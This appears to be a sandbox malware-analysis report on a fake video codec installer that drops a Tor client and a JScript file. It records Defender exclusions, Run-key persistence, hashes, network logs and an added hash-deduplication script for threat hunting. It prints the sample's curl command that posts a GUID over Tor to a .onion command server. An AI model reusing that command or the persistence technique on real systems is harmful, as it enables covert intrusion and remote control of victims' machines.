File name: xmpg_codec.exe
Full analysis: https://app.any.run/tasks/90efe399-fff2-4e3b-b09f-f09ef1a01eec
Verdict: Malicious activity
Analysis date: December 12, 2024, 10:52:33
OS: Windows 10 Professional (build: 19045, 64 bit)
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386, for MS Windows, 11 sections
MD5: 3A7F402303B1A355BB2044D25502B9F6
SHA1: D63A9324E3E544CAB121C456EFCFACAC0708AA54
SHA256: 9C1A0608BAE991AF50096ACAEC9D979DF9F9A3BB6E89D9D20972D6CFEB9582BB
SSDEEP: 98304:mrq3Bdwb7ra9MwctZHhlAsHqAgQk98AR8gybf3j6PsfZiCIDKmtp0SMBkPE6c+6s:hddGcMW

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS
    • Adds path to the Windows Defender exclusion list
      • xmpg_codec.tmp (PID: 6648)
      • cmd.exe (PID: 7072)
    • Changes the autorun value in the registry
      • xmpg_codec.tmp (PID: 6648)
    • Gets TEMP folder path (SCRIPT)
      • wscript.exe (PID: 6600)
    • Uses sleep, probably for detection evasion (SCRIPT)
      • wscript.exe (PID: 6600)
    • Accesses environment variables (SCRIPT)
      • wscript.exe (PID: 6600)
    • Accesses BIOS (Win32_BIOS, may evade sandboxes) via WMI (SCRIPT)
      • wscript.exe (PID: 6600)
  • SUSPICIOUS
    • Reads security settings of Internet Explorer
      • xmpg_codec.tmp (PID: 6456)
    • Executable content was dropped or overwritten
      • xmpg_codec.exe (PID: 6432)
      • xmpg_codec.exe (PID: 6620)
      • xmpg_codec.tmp (PID: 6648)
    • Reads the Windows owner or organization settings
      • xmpg_codec.tmp (PID: 6648)
    • Starts CMD.EXE for command execution
      • xmpg_codec.tmp (PID: 6648)
    • Runs shell command (SCRIPT)
      • wscript.exe (PID: 6600)
    • The process executes JS scripts
      • cmd.exe (PID: 5432)
    • Connects to unusual port
      • tor.exe (PID: 2380)
    • Executes WMI query (SCRIPT)
      • wscript.exe (PID: 6600)
    • Uses WMI to retrieve WMI-managed resources (SCRIPT)
      • wscript.exe (PID: 6600)
    • Creates FileSystem object to access computer's file system (SCRIPT)
      • wscript.exe (PID: 6600)
    • Script adds exclusion path to Windows Defender
      • cmd.exe (PID: 7072)
    • Starts POWERSHELL.EXE for command execution
      • cmd.exe (PID: 7072)
    • Checks whether a specific file exists (SCRIPT)
      • wscript.exe (PID: 6600)
  • INFO
    • Checks supported languages
      • xmpg_codec.exe (PID: 6432)
      • xmpg_codec.tmp (PID: 6456)
      • xmpg_codec.exe (PID: 6620)
      • xmpg_codec.tmp (PID: 6648)
      • curl.exe (PID: 5096)
    • Reads the computer name
      • xmpg_codec.exe (PID: 6620)
      • xmpg_codec.tmp (PID: 6456)
      • xmpg_codec.tmp (PID: 6648)
      • tor.exe (PID: 2380)
    • Process checks computer location settings
      • xmpg_codec.tmp (PID: 6456)
    • Creates files in a temporary directory
      • xmpg_codec.exe (PID: 6432)
    • Creates files in the program directory
      • xmpg_codec.tmp (PID: 6648)
    • Creates a software uninstall entry
      • xmpg_codec.tmp (PID: 6648)
    • The process uses the downloaded file
      • powershell.exe (PID: 7128)
    • Script raised an exception (POWERSHELL)
      • powershell.exe (PID: 7128)
    • Checks if a key exists in the options dictionary (POWERSHELL)
      • powershell.exe (PID: 7128)
    • Reads the machine GUID from the registry
      • tor.exe (PID: 2380)
    • Creates files or folders in the user directory
      • tor.exe (PID: 2380)
    • Execution of CURL command
      • wscript.exe (PID: 6600)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Inno Setup installer (53.5)
.exe | InstallShield setup (21)
.exe | Win32 EXE PECompact compressed (generic) (20.2)
.exe | Win32 Executable (generic) (2.1)
.exe | Win16/32 Executable Delphi generic (1)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2024:07:12 07:26:53+00:00
ImageFileCharacteristics: Executable, 32-bit
PEType: PE32
LinkerVersion: 2.25
CodeSize: 685056
InitializedDataSize: 159744
UninitializedDataSize: -
EntryPoint: 0xa83bc
OSVersion: 6.1
ImageVersion: -
SubsystemVersion: 6.1
Subsystem: Windows GUI
FileVersionNumber: 0.0.0.0
ProductVersionNumber: 0.0.0.0
FileFlagsMask: 0x003f
FileFlags: (none)
FileOS: Win32
ObjectFileType: Executable application
FileSubtype: -
LanguageCode: Neutral
CharacterSet: Unicode
Comments: This installation was built with Inno Setup.
CompanyName: MMPEG LAB
FileDescription: Video Codec Pack Setup
FileVersion:
LegalCopyright:
OriginalFileName:
ProductName: Video Codec Pack
ProductVersion: 1.5
All screenshots are available in the full report
Total processes: 147
Monitored processes: 15
Malicious processes: 5
Suspicious processes: 3

Behavior graph

Processes shown in the graph, in order of appearance: start, xmpg_codec.exe, xmpg_codec.tmp (no specs), xmpg_codec.exe, xmpg_codec.tmp, cmd.exe (no specs), conhost.exe (no specs), powershell.exe (no specs), cmd.exe (no specs), conhost.exe (no specs), wscript.exe (no specs), tor.exe, conhost.exe (no specs), curl.exe (no specs), conhost.exe (no specs), rundll32.exe (no specs)

Process information

PID:
2380
CMD:
"C:\Program Files (x86)\Controller\tor.exe"
Path:
C:\Program Files (x86)\Controller\tor.exe
Parent process:
wscript.exe
User:
admin
Integrity Level:
HIGH
Modules
Images
c:\program files (x86)\controller\tor.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\shell32.dll
c:\windows\system32\msvcp_win.dll
PID:
2428
CMD:
\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path:
C:\Windows\System32\conhost.exe
Parent process:
curl.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID:
3876
CMD:
C:\WINDOWS\System32\rundll32.exe C:\WINDOWS\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Path:
C:\Windows\System32\rundll32.exe
Parent process:
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows host process (Rundll32)
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\rundll32.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\shcore.dll
c:\windows\system32\imagehlp.dll
PID:
4932
CMD:
\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path:
C:\Windows\System32\conhost.exe
Parent process:
tor.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID:
5096
CMD:
"C:\Windows\System32\curl.exe" -X POST -d "GUID=null&action=GUID" --socks5-hostname localhost:9050 http://cgky6bn6ux5wvlybtmm3z255igt52ljml2ngnc5qp3cnw5jlglamisad.onion/route.php -o C:\Users\admin\AppData\Local\Temp\cfile
Path:
C:\Windows\SysWOW64\curl.exe (the command line names System32; because the parent wscript.exe is the 32-bit SysWOW64 copy, WoW64 file system redirection resolves it to SysWOW64)
Parent process:
wscript.exe
User:
admin
Company:
curl, https://curl.se/
Integrity Level:
HIGH
Description:
The curl executable
Exit code:
97 (curl CURLE_PROXY, "proxy handshake error": the SOCKS5 hop through localhost:9050 did not complete, so this POST never reached the .onion host)
Version:
8.4.0
Modules
Images
c:\windows\syswow64\curl.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\ws2_32.dll
c:\windows\syswow64\rpcrt4.dll
PID:
5432
CMD:
"cmd.exe" /C wscript.exe "C:/Program Files (x86)/Controller/ntdlg.js"
Path:
C:\Windows\SysWOW64\cmd.exe
Parent process:
xmpg_codec.tmp
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
PID:
6200
CMD:
\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path:
C:\Windows\System32\conhost.exe
Parent process:
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID:
6432
CMD:
"C:\Users\admin\Desktop\xmpg_codec.exe"
Path:
C:\Users\admin\Desktop\xmpg_codec.exe
Parent process:
explorer.exe
User:
admin
Company:
MMPEG LAB
Integrity Level:
MEDIUM
Description:
Video Codec Pack Setup
Exit code:
0
Version:
Modules
Images
c:\users\admin\desktop\xmpg_codec.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\comctl32.dll
PID:
6456
CMD:
"C:\Users\admin\AppData\Local\Temp\is-DSS32.tmp\xmpg_codec.tmp" /SL5="$902A4,3265534,845824,C:\Users\admin\Desktop\xmpg_codec.exe"
Path:
C:\Users\admin\AppData\Local\Temp\is-DSS32.tmp\xmpg_codec.tmp
Parent process:
xmpg_codec.exe
User:
admin
Company:
MMPEG LAB
Integrity Level:
MEDIUM
Description:
Setup/Uninstall
Exit code:
0
Version:
51.1052.0.0
Modules
Images
c:\users\admin\appdata\local\temp\is-dss32.tmp\xmpg_codec.tmp
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\comdlg32.dll
PID:
6600
CMD:
wscript.exe "C:/Program Files (x86)/Controller/ntdlg.js"
Path:
C:\Windows\SysWOW64\wscript.exe
Parent process:
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Microsoft ® Windows Based Script Host
Version:
5.812.10240.16384
Modules
Images
c:\windows\syswow64\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
Total events: 7197
Read events: 7177
Write events: 20
Delete events: 0

Modification events

(PID 6648) xmpg_codec.tmp
Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run
Operation: write
Name: Controller
Value: "C:\Windows\System32\wscript.exe" "C:\Program Files (x86)\Controller\ntdlg.js"

(PID 6648) xmpg_codec.tmp
Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{7EADDEF0-C53B-4E9E-B5E4-62ABFEA3E5CF}_is1
Operation: write (nine values)
  Inno Setup: Setup Version = 6.3.3
  Inno Setup: App Path = C:\Program Files (x86)\Controller
  InstallLocation = C:\Program Files (x86)\Controller\
  Inno Setup: Icon Group = Video Codec Pack
  Inno Setup: User = admin
  Inno Setup: Language = english
  DisplayName = Video Codec Pack version 1.5
  UninstallString = "C:\Program Files (x86)\Controller\unins000.exe"
  QuietUninstallString = "C:\Program Files (x86)\Controller\unins000.exe" /SILENT
Executable files: 7
Suspicious files: 2
Text files: 19
Unknown types: 0

Dropped files

PID | Process | Filename | Type | MD5 | SHA256
6648 | xmpg_codec.tmp | C:\Users\admin\AppData\Local\Temp\is-2D70K.tmp\_isetup\_setup64.tmp | executable | E4211D6D009757C078A9FAC7FF4F03D4 | 388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
6432 | xmpg_codec.exe | C:\Users\admin\AppData\Local\Temp\is-DSS32.tmp\xmpg_codec.tmp | executable | 54740ECCF642110ADEF58C56251FEE80 | CAB8BC9FFAC294E2B2199305117582BBA6524F2C829C548961D65F18F97B934C
6648 | xmpg_codec.tmp | C:\Program Files (x86)\Controller\ntdlg.js | text | 864BEFD925D922F91750256D5348EDA1 | 2EC555C34F0AF1514501CA5E4D999C843D5B9DE7973467820FCF6034A517C4CC
6648 | xmpg_codec.tmp | C:\Program Files (x86)\Controller\is-CRA0C.tmp | executable | 5D132FB6EC6FAC12F01687F2C0375353 | 6B866C187A0DEE2FB751A8990D50DC1ED83F68E025720081E4D8E27097067DC8
6648 | xmpg_codec.tmp | C:\Program Files (x86)\Controller\unins000.dat | binary | 8E5F8B16A1B78C47D0478318A9186995 | 2D65D61AE41E6D83F758E051F774C03FD28EC050DDEDCE8EAF9DA145B6626A48
6648 | xmpg_codec.tmp | C:\Program Files (x86)\Controller\is-QIABU.tmp | text | 864BEFD925D922F91750256D5348EDA1 | 2EC555C34F0AF1514501CA5E4D999C843D5B9DE7973467820FCF6034A517C4CC
6620 | xmpg_codec.exe | C:\Users\admin\AppData\Local\Temp\is-78F5F.tmp\xmpg_codec.tmp | executable | 54740ECCF642110ADEF58C56251FEE80 | CAB8BC9FFAC294E2B2199305117582BBA6524F2C829C548961D65F18F97B934C
6648 | xmpg_codec.tmp | C:\Program Files (x86)\Controller\unins000.exe | executable | DB518BD52B3ECB5E564836844B8D2D77 | 9F15BCC164656E92075BD3036D47ED264C258031D5B5EFCC216794BEE078A4BF
6648 | xmpg_codec.tmp | C:\Program Files (x86)\Controller\tor.exe | executable | 5D132FB6EC6FAC12F01687F2C0375353 | 6B866C187A0DEE2FB751A8990D50DC1ED83F68E025720081E4D8E27097067DC8
2380 | tor.exe | C:\Users\admin\AppData\Roaming\tor\cached-certs.tmp | text | 6C014C899A7C48E072E250645E4D6166 | 8A733970CC86F2D73D91760AE143B70382F2742D35526387B4949EB5D05E71C2

Note: is-CRA0C.tmp and tor.exe carry the same hash, as do is-QIABU.tmp and ntdlg.js. Inno Setup writes each file under a temporary is-XXXXX.tmp name and then renames it into place, so both payloads appear twice. The two xmpg_codec.tmp copies are also identical: one comes from the first run of the installer (PID 6432) and one from its second run (PID 6620), whose descendants (xmpg_codec.tmp 6648, cmd.exe 5432, wscript.exe 6600) execute at HIGH integrity.
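The list above has ten rows but only seven distinct hashes, and several of those belong to the Inno Setup framework rather than to this sample. The Python below is an added example for this page (not ANY.RUN's code and not part of the sample) that groups the rows by SHA-256, separates Inno's is-XXXXX.tmp staging copies from the final paths, and flags the framework's own helper files (_setup64.tmp, unins000.exe, unins000.dat), leaving the two sample-specific payloads, tor.exe and ntdlg.js, at their final paths. The rows are transcribed from the report; the category names are this example's own.

```python
"""Added example: de-duplicate a sandbox dropped-file list by hash and
separate Inno Setup staging copies and helpers from the real payloads."""
import re
from collections import defaultdict

# Inno Setup staging: is-XXXXX.tmp file or directory, or the _isetup helper dir
STAGING_RE = re.compile(r"\\is-[A-Z0-9]{5}\.tmp(?:\\|$)|\\_isetup\\", re.I)
INNO_HELPERS = {"_setup64.tmp", "unins000.exe", "unins000.dat"}

DROPPED = [  # (pid, process, path, type, sha256) transcribed from the report
    (6648, "xmpg_codec.tmp", r"C:\Users\admin\AppData\Local\Temp\is-2D70K.tmp\_isetup\_setup64.tmp", "executable",
     "388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95"),
    (6432, "xmpg_codec.exe", r"C:\Users\admin\AppData\Local\Temp\is-DSS32.tmp\xmpg_codec.tmp", "executable",
     "CAB8BC9FFAC294E2B2199305117582BBA6524F2C829C548961D65F18F97B934C"),
    (6648, "xmpg_codec.tmp", r"C:\Program Files (x86)\Controller\ntdlg.js", "text",
     "2EC555C34F0AF1514501CA5E4D999C843D5B9DE7973467820FCF6034A517C4CC"),
    (6648, "xmpg_codec.tmp", r"C:\Program Files (x86)\Controller\is-CRA0C.tmp", "executable",
     "6B866C187A0DEE2FB751A8990D50DC1ED83F68E025720081E4D8E27097067DC8"),
    (6648, "xmpg_codec.tmp", r"C:\Program Files (x86)\Controller\unins000.dat", "binary",
     "2D65D61AE41E6D83F758E051F774C03FD28EC050DDEDCE8EAF9DA145B6626A48"),
    (6648, "xmpg_codec.tmp", r"C:\Program Files (x86)\Controller\is-QIABU.tmp", "text",
     "2EC555C34F0AF1514501CA5E4D999C843D5B9DE7973467820FCF6034A517C4CC"),
    (6620, "xmpg_codec.exe", r"C:\Users\admin\AppData\Local\Temp\is-78F5F.tmp\xmpg_codec.tmp", "executable",
     "CAB8BC9FFAC294E2B2199305117582BBA6524F2C829C548961D65F18F97B934C"),
    (6648, "xmpg_codec.tmp", r"C:\Program Files (x86)\Controller\unins000.exe", "executable",
     "9F15BCC164656E92075BD3036D47ED264C258031D5B5EFCC216794BEE078A4BF"),
    (6648, "xmpg_codec.tmp", r"C:\Program Files (x86)\Controller\tor.exe", "executable",
     "6B866C187A0DEE2FB751A8990D50DC1ED83F68E025720081E4D8E27097067DC8"),
    (2380, "tor.exe", r"C:\Users\admin\AppData\Roaming\tor\cached-certs.tmp", "text",
     "8A733970CC86F2D73D91760AE143B70382F2742D35526387B4949EB5D05E71C2"),
]


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def dedupe(rows):
    """Group rows by SHA-256 and classify each hash:
    inno_helper      installer framework file, not specific to this sample
    payload_renamed  seen under an is-XXXXX.tmp staging name and a final name
    written_directly final path only (e.g. runtime data written by tor.exe)
    staging_only     only ever seen under a staging path"""
    groups = defaultdict(lambda: {"final": set(), "staging": set(), "writers": set(), "type": None})
    for pid, proc, path, ftype, sha in rows:
        g = groups[sha.upper()]
        (g["staging"] if STAGING_RE.search(path) else g["final"]).add(path)
        g["writers"].add(f"{proc} ({pid})")
        g["type"] = ftype
    for g in groups.values():
        names = {basename(p) for p in g["final"] | g["staging"]}
        if names & INNO_HELPERS:
            g["category"] = "inno_helper"
        elif g["final"] and g["staging"]:
            g["category"] = "payload_renamed"
        elif g["final"]:
            g["category"] = "written_directly"
        else:
            g["category"] = "staging_only"
    return dict(groups)


def hunt_set(rows):
    """Sample-specific payload hashes mapped to their final on-disk paths."""
    return {sha: sorted(g["final"]) for sha, g in dedupe(rows).items()
            if g["category"] == "payload_renamed"}
```

`hunt_set(DROPPED)` returns two hashes: 6B86...7DC8 at C:\Program Files (x86)\Controller\tor.exe and 2EC5...C4CC at C:\Program Files (x86)\Controller\ntdlg.js. tor.exe is most likely a stock Tor build (the report lists no company for it and its traffic is ordinary Tor bootstrap activity), so its hash alone is a weak indicator; the install path and the wscript.exe parent are the better hunt keys, and ntdlg.js, which the Run value points at, is the sample-specific component.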
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 8
TCP/UDP connections: 37
DNS requests: 19
Threats: 4

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | Type | Reputation
- | - | GET | 200 | 88.221.169.152:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | whitelisted
- | - | GET | 200 | 2.16.164.49:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | whitelisted
5064 | SearchApp.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D | unknown | whitelisted
1176 | svchost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | whitelisted
7136 | SIHClient.exe | GET | 200 | 88.221.169.152:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | whitelisted
7136 | SIHClient.exe | GET | 200 | 88.221.169.152:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | whitelisted
6340 | backgroundTaskHost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D | unknown | whitelisted
5064 | SearchApp.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEA77flR%2B3w%2FxBpruV2lte6A%3D | unknown | whitelisted

All eight requests are CRL/OCSP fetches by Windows components (SearchApp.exe, svchost.exe, SIHClient.exe, backgroundTaskHost.exe); none originates from the sample's process tree. The only request the sample attempted, the curl.exe POST to the .onion URL, went through the Tor SOCKS5 port and failed at the proxy handshake (exit code 97), so it produced no HTTP traffic.

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
4 | System | 192.168.100.255:137 | - | - | - | whitelisted
4712 | MoUsoCoreWorker.exe | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
3220 | svchost.exe | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
- | - | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
- | - | 2.16.164.49:80 | crl.microsoft.com | Akamai International B.V. | NL | whitelisted
5064 | SearchApp.exe | 2.23.209.164:443 | www.bing.com | Akamai International B.V. | GB | whitelisted
- | - | 88.221.169.152:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted
5064 | SearchApp.exe | 192.229.221.95:80 | ocsp.digicert.com | EDGECAST | US | whitelisted
4 | System | 192.168.100.255:138 | - | - | - | whitelisted
1176 | svchost.exe | 20.190.159.73:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted

This excerpt lists 10 of the 37 connections, all from Windows components; the tor.exe (PID 2380) connections that triggered the ET TOR signatures in the Threats section are not among them.

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.104.136.2
  • 20.73.194.208
  • 4.231.128.59
whitelisted
google.com
  • 172.217.23.110
whitelisted
crl.microsoft.com
  • 2.16.164.49
  • 2.16.164.106
whitelisted
www.bing.com
  • 2.23.209.164
  • 2.23.209.163
  • 2.23.209.171
  • 2.23.209.168
  • 2.23.209.173
  • 2.23.209.166
  • 2.23.209.162
  • 2.23.209.167
  • 2.23.209.169
  • 2.23.209.139
  • 2.23.209.140
  • 2.23.209.135
  • 2.23.209.133
  • 2.23.209.142
  • 2.23.209.137
  • 2.23.209.136
  • 2.23.209.132
  • 2.23.209.131
whitelisted
www.microsoft.com
  • 88.221.169.152
whitelisted
ocsp.digicert.com
  • 192.229.221.95
whitelisted
login.live.com
  • 20.190.159.73
  • 40.126.31.73
  • 20.190.159.0
  • 20.190.159.64
  • 20.190.159.2
  • 20.190.159.23
  • 20.190.159.68
  • 40.126.31.67
whitelisted
go.microsoft.com
  • 184.28.89.167
whitelisted
arc.msn.com
  • 20.199.58.43
whitelisted
fd.api.iris.microsoft.com
  • 20.103.156.88
whitelisted

Threats

PID | Process | Class | Message
2380 | tor.exe | Misc Attack | ET TOR Known Tor Exit Node Traffic group 94
2380 | tor.exe | Misc Attack | ET TOR Known Tor Relay/Router (Not Exit) Node Traffic group 94
2380 | tor.exe | Misc Attack | ET TOR Known Tor Relay/Router (Not Exit) Node Traffic group 280
2380 | tor.exe | Misc Attack | ET TOR Known Tor Relay/Router (Not Exit) Node Traffic group 148